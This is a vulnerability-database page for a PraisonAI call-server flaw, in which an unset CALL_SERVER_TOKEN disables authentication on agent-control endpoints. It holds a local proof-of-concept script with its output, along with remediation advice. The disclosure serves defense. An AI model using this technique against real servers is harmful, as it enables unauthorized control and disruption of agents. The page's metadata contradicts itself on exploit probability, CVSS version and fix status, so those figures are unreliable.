CVE-2026-47396

CRITICALPre-NVD 9.89.8
EchelonGraph scoreLOW confidence

This critical-severity CVE scores 9.8 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.1%, top 77% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
9.8
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 9.8Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

PraisonAI call server exposes unauthenticated agent listing, invocation, and deletion when CALL_SERVER_TOKEN is unset

Summary

PraisonAI's call server exposes a network-facing agent control API without authentication when CALL_SERVER_TOKEN is not configured.

The affected component is the praisonai.api.agent_invoke router as mounted by praisonai.api.call. The authentication helper verify_token() fails open when CALL_SERVER_TOKEN is unset. Since every sensitive agent-control endpoint depends on this helper, starting the call server without a token allows any reachable client to list agents, inspect agent metadata and instructions, invoke agents, and unregister agents.

This is security-relevant because the bundled call server includes the vulnerable router and binds to 0.0.0.0. As a result, operators who launch the call server without explicitly setting CALL_SERVER_TOKEN may unintentionally expose an unauthenticated remote agent control plane.

Details

The vulnerable behavior is caused by a fail-open authentication default.

In praisonai/api/agent_invoke.py, CALL_SERVER_TOKEN is read from the environment:

CALL_SERVER_TOKEN = os.getenv('CALL_SERVER_TOKEN')

The authentication dependency then returns successfully when the token is not configured:

async def verify_token(request: Request, authorization: Optional[str] = Header(None)) -> None:
    if not FASTAPI_AVAILABLE or not CALL_SERVER_TOKEN:
        return  # No authentication if FastAPI unavailable or no token set

This means that the absence of CALL_SERVER_TOKEN disables authentication entirely.

The same helper is used by sensitive agent-control routes, including:

@router.post("/agents/{agent_id}/invoke")
async def invoke_agent(..., _: None = Depends(verify_token))

@router.get("/agents") async def list_agents(_: None = Depends(verify_token))

@router.delete("/agents/{agent_id}") async def unregister_agent_endpoint(agent_id: str, _: None = Depends(verify_token))

@router.get("/agents/{agent_id}") async def get_agent_info(agent_id: str, _: None = Depends(verify_token))

These endpoints allow a caller to:

  • list registered agents;
  • retrieve agent metadata;
  • retrieve agent instruction text;
  • invoke agents;
  • unregister agents.

The vulnerable router is mounted by the call server:

from .agent_invoke import router as agent_invoke_router
app.include_router(agent_invoke_router)

The call server then listens on all interfaces:

uvicorn.run(app, host="0.0.0.0", port=port, log_level="warning")

Therefore, when praisonai-call is started without CALL_SERVER_TOKEN, the agent-control API becomes reachable without authentication from any client that can access the server.

PoC

The following local PoC imports the real praisonai.api.agent_invoke router from source, ensures CALL_SERVER_TOKEN is absent, registers a demo agent, mounts the router into a local FastAPI app, and sends unauthenticated requests to the vulnerable endpoints.

The PoC proves that, without sending any authentication material:

  • GET /api/v1/agents returns the list of registered agents.
  • GET /api/v1/agents/{agent_id} exposes agent metadata and instructions.
  • POST /api/v1/agents/{agent_id}/invoke executes the registered agent.
  • DELETE /api/v1/agents/{agent_id} unregisters the agent.

Run with:

PRAISONAI_REPO=/path/to/PraisonAI python -B embedded_poc.py

Full PoC:

#!/usr/bin/env python3
from __future__ import annotations

import os import sys from pathlib import Path from types import SimpleNamespace

REPO_ROOT = Path(os.environ.get("PRAISONAI_REPO", "/path/to/PraisonAI")).resolve() PRAISON_ROOT = REPO_ROOT / "src" / "praisonai"

def verify_source() -> None: expected = { PRAISON_ROOT / "praisonai/api/agent_invoke.py": [ "CALL_SERVER_TOKEN = os.getenv('CALL_SERVER_TOKEN')", "if not FASTAPI_AVAILABLE or not CALL_SERVER_TOKEN:", '@router.post("/agents/{agent_id}/invoke")', '@router.get("/agents")', '@router.delete("/agents/{agent_id}")', '@router.get("/agents/{agent_id}")', ], PRAISON_ROOT / "praisonai/api/call.py": [ "app.include_router(agent_invoke_router)", 'uvicorn.run(app, host="0.0.0.0", port=port, log_level="warning")', ], }

for path, needles in expected.items(): if not path.exists(): raise RuntimeError(f"source verification failed: file not found: {path}")

text = path.read_text(encoding="utf-8") for needle in needles: if needle not in text: raise RuntimeError(f"source verification failed: {needle!r} not found in {path}")

class DemoAgent: name = "demo-agent" instructions = "super-secret instructions" tools = [SimpleNamespace(name="danger-tool")]

def start(self, message: str) -> str: return f"echo:{message}"

def main() -> int: verify_source()

os.environ.pop("CALL_SERVER_TOKEN", None) sys.path.insert(0, str(PRAISON_ROOT))

from fastapi import FastAPI from fastapi.testclient import TestClient from praisonai.api.agent_invoke import CALL_SERVER_TOKEN, register_agent, router

app = FastAPI() app.include_router(router)

register_agent("demo", DemoAgent())

client = TestClient(app)

list_resp = client.get("/api/v1/agents") info_resp = client.get("/api/v1/agents/demo") invoke_resp = client.post("/api/v1/agents/demo/invoke", json={"message": "hello"}) delete_resp = client.delete("/api/v1/agents/demo")

print(f"[poc] token_configured={bool(CALL_SERVER_TOKEN)}") print(f"[poc] list_status={list_resp.status_code} body={list_resp.json()}") print(f"[poc] info_status={info_resp.status_code} body={info_resp.json()}") print(f"[poc] invoke_status={invoke_resp.status_code} body={invoke_resp.json()}") print(f"[poc] delete_status={delete_resp.status_code} body={delete_resp.json()}")

if CALL_SERVER_TOKEN: raise SystemExit("[poc] MISS: CALL_SERVER_TOKEN unexpectedly set in test process")

if list_resp.status_code != 200 or "demo" not in list_resp.json().get("agents", []): raise SystemExit("[poc] MISS: unauthenticated agent listing failed")

if info_resp.status_code != 200 or info_resp.json().get("instructions") != "super-secret instructions": raise SystemExit("[poc] MISS: unauthenticated agent info leak failed")

if invoke_resp.status_code != 200 or invoke_resp.json().get("result") != "echo:hello": raise SystemExit("[poc] MISS: unauthenticated agent invocation failed")

if delete_resp.status_code != 200: raise SystemExit("[poc] MISS: unauthenticated agent unregister failed")

print("[poc] HIT: unauthenticated caller listed, inspected, invoked, and unregistered the demo agent") return 0

if __name__ == "__main__": raise SystemExit(main())

Observed result:

[poc] token_configured=False
[poc] list_status=200 body={'agents': ['demo'], 'count': 1, 'status': 'success'}
[poc] info_status=200 body={'agent_id': 'demo', 'status': 'registered', 'type': 'DemoAgent', 'name': 'demo-agent', 'instructions': 'super-secret instructions', 'tools': ['danger-tool']}
[poc] invoke_status=200 body={'result': 'echo:hello', 'session_id': 'default', 'status': 'success', 'metadata': {'agent_id': 'demo', 'message_length': 5, 'response_length': 10}}
[poc] delete_status=200 body={'message': "Agent 'demo' unregistered successfully", 'status': 'success'}
[poc] HIT: unauthenticated caller listed, inspected, invoked, and unregistered the demo agent

This confirms that the agent-control endpoints are accessible without authentication when CALL_SERVER_TOKEN is unset.

Impact

If an operator runs the PraisonAI call server without explicitly setting CALL_SERVER_TOKEN, any reachable client may be able to:

  • enumerate registered agents;
  • read agent metadata;
  • read agent instruction text;
  • invoke agents;
  • trigger downstream tools or external integrations connected to agents;
  • consume model or API budget through repeated invocation;
  • unregister agents and disrupt availability.

The impact depends on the deployed agents and their connected tools. For agents wired to external APIs, internal systems, local tools, or privileged actions, this creates a remote unauthenticated control surface.

The issue is not limited to information disclosure. The unauthenticated invoke endpoint can trigger agent execution, and the unauthenticated delete endpoint can remove registered agents.

Suggested remediation

Recommended fixes:

  • Fail closed when CALL_SERVER_TOKEN is unset.

The authentication dependency should reject requests unless authentication is explicitly configured and a valid token is supplied.

  • Refuse to mount the agent invocation router unless authentication is configured.
  • If unauthenticated mode is intended for local development, bind to 127.0.0.1 by default when CALL_SERVER_TOKEN is absent.
  • Add a startup error or highly visible warning when the call server is started without authentication.
  • Add regression tests that assert 401 Unauthorized for all sensitive agent routes when no valid token is supplied.
  • Consider requiring an explicit unsafe flag, such as --allow-unauthenticated-call-server, before allowing the server to start without authentication.

Security boundary

This report concerns the default authentication behavior of a network-facing server component. The issue is not that users can intentionally disable authentication for trusted local development. The issue is that the server fails open when CALL_SERVER_TOKEN is missing while the bundled server binds to 0.0.0.0, which can expose the agent-control API remotely.

CVSS v3
9.8
EG Score
9.8(low)
EPSS
22.9%
KEV
Not listed

Published

May 29, 2026

Last Modified

May 29, 2026

Vendor Advisories for CVE-2026-47396(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
PyPI(1)
PackageVulnerable rangeFixed inDependents
praisonai0.0.1 ... 4.6.9 (731 versions)4.6.40

Data Freshness Timeline

(refreshed 8× in last 7d / 63× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

Showing the most recent 100 of 164 total refreshes for this CVE.

  1. 2026-07-16 10:00 UTCEG score recompute
  2. 2026-07-16 01:46 UTCEG score recompute
  3. 2026-07-14 21:56 UTCEG score recompute
  4. 2026-07-14 17:35 UTCEG score recompute
  5. 2026-07-14 13:45 UTCEG score recompute
  6. 2026-07-12 00:56 UTCEG score recompute
  7. 2026-07-11 20:46 UTCEG score recompute
  8. 2026-07-11 16:55 UTCEG score recompute
  9. 2026-07-08 22:42 UTCEG score recompute
  10. 2026-07-08 17:15 UTCEG score recompute
  11. 2026-07-02 23:01 UTCEG score recompute
  12. 2026-07-02 18:55 UTCEG score recompute
  13. 2026-07-02 12:49 UTCEG score recompute
  14. 2026-07-02 08:09 UTCEG score recompute
  15. 2026-07-02 03:42 UTCEG score recompute
  16. 2026-07-01 20:35 UTCEG score recompute
  17. 2026-07-01 16:43 UTCEG score recompute
  18. 2026-07-01 12:27 UTCEG score recompute
  19. 2026-07-01 08:37 UTCEG score recompute
  20. 2026-07-01 01:17 UTCEG score recompute
  21. 2026-06-30 09:27 UTCEG score recompute
  22. 2026-06-30 05:37 UTCEG score recompute
  23. 2026-06-30 00:52 UTCEG score recompute
  24. 2026-06-29 20:09 UTCEG score recompute
  25. 2026-06-29 16:18 UTCEG score recompute
Show 75 more
  1. 2026-06-29 12:27 UTCEG score recompute
  2. 2026-06-29 03:29 UTCEG score recompute
  3. 2026-06-28 23:36 UTCEG score recompute
  4. 2026-06-28 19:46 UTCEG score recompute
  5. 2026-06-28 15:54 UTCEG score recompute
  6. 2026-06-28 11:09 UTCEG score recompute
  7. 2026-06-28 07:18 UTCEG score recompute
  8. 2026-06-28 03:27 UTCEG score recompute
  9. 2026-06-27 23:37 UTCEG score recompute
  10. 2026-06-27 19:47 UTCEG score recompute
  11. 2026-06-27 15:53 UTCEG score recompute
  12. 2026-06-27 12:03 UTCEG score recompute
  13. 2026-06-27 08:02 UTCEG score recompute
  14. 2026-06-27 04:11 UTCEG score recompute
  15. 2026-06-27 00:02 UTCEG score recompute
  16. 2026-06-26 20:00 UTCEG score recompute
  17. 2026-06-26 16:10 UTCEG score recompute
  18. 2026-06-26 02:26 UTCEG score recompute
  19. 2026-06-25 22:36 UTCEG score recompute
  20. 2026-06-25 18:38 UTCEG score recompute
  21. 2026-06-25 14:48 UTCEG score recompute
  22. 2026-06-25 10:58 UTCEG score recompute
  23. 2026-06-25 06:19 UTCEG score recompute
  24. 2026-06-25 02:23 UTCEG score recompute
  25. 2026-06-24 22:32 UTCEG score recompute
  26. 2026-06-24 15:10 UTCEG score recompute
  27. 2026-06-24 02:44 UTCEG score recompute
  28. 2026-06-18 22:21 UTCEG score recompute
  29. 2026-06-18 10:16 UTCEG score recompute
  30. 2026-06-18 02:54 UTCEG score recompute
  31. 2026-06-17 23:04 UTCEG score recompute
  32. 2026-06-17 19:13 UTCEG score recompute
  33. 2026-06-17 15:24 UTCEG score recompute
  34. 2026-06-17 11:32 UTCEG score recompute
  35. 2026-06-17 07:41 UTCEG score recompute
  36. 2026-06-17 03:14 UTCEG score recompute
  37. 2026-06-16 23:24 UTCEG score recompute
  38. 2026-06-16 19:34 UTCEG score recompute
  39. 2026-06-16 15:42 UTCEG score recompute
  40. 2026-06-16 11:53 UTCEG score recompute
  41. 2026-06-16 08:02 UTCEG score recompute
  42. 2026-06-16 04:11 UTCEG score recompute
  43. 2026-06-16 00:17 UTCEG score recompute
  44. 2026-06-15 20:28 UTCEG score recompute
  45. 2026-06-15 13:14 UTCEG score recompute
  46. 2026-06-15 09:20 UTCEG score recompute
  47. 2026-06-15 04:43 UTCEG score recompute
  48. 2026-06-15 00:53 UTCEG score recompute
  49. 2026-06-14 23:18 UTCEPSS rescore
  50. 2026-06-14 21:02 UTCEG score recompute
  51. 2026-06-14 17:13 UTCEG score recompute
  52. 2026-06-14 13:20 UTCEG score recompute
  53. 2026-06-14 09:30 UTCEG score recompute
  54. 2026-06-14 05:39 UTCEG score recompute
  55. 2026-06-14 01:47 UTCEG score recompute
  56. 2026-06-13 23:00 UTCEPSS rescore
  57. 2026-06-13 21:56 UTCEG score recompute
  58. 2026-06-13 18:06 UTCEG score recompute
  59. 2026-06-13 13:57 UTCEG score recompute
  60. 2026-06-13 10:07 UTCEG score recompute
  61. 2026-06-13 06:16 UTCEG score recompute
  62. 2026-06-13 02:13 UTCEG score recompute
  63. 2026-06-12 23:12 UTCEPSS rescore
  64. 2026-06-12 22:22 UTCEG score recompute
  65. 2026-06-12 18:30 UTCEG score recompute
  66. 2026-06-12 14:40 UTCEG score recompute
  67. 2026-06-12 10:49 UTCEG score recompute
  68. 2026-06-12 06:59 UTCEG score recompute
  69. 2026-06-12 03:09 UTCEG score recompute
  70. 2026-06-11 23:19 UTCEG score recompute
  71. 2026-06-11 19:29 UTCEG score recompute
  72. 2026-06-11 15:39 UTCEG score recompute
  73. 2026-06-11 11:39 UTCEG score recompute
  74. 2026-06-11 07:48 UTCEG score recompute
  75. 2026-06-11 03:58 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-47396?
CVE-2026-47396 is a critical vulnerability published on May 29, 2026. PraisonAI call server exposes unauthenticated agent listing, invocation, and deletion when CALLSERVERTOKEN is unset Summary PraisonAI's call server exposes a network-facing agent control API without authentication when CALLSERVERTOKEN is not configured. The affected component is the…
When was CVE-2026-47396 disclosed?
CVE-2026-47396 was first published in the National Vulnerability Database on May 29, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-47396 actively exploited?
CVE-2026-47396 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 22.9% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-47396?
CVE-2026-47396 has a CVSS v4.0 base score of 9.8 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-47396?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-47396, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-47396

Explore →

Is Your Infrastructure Affected by CVE-2026-47396?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.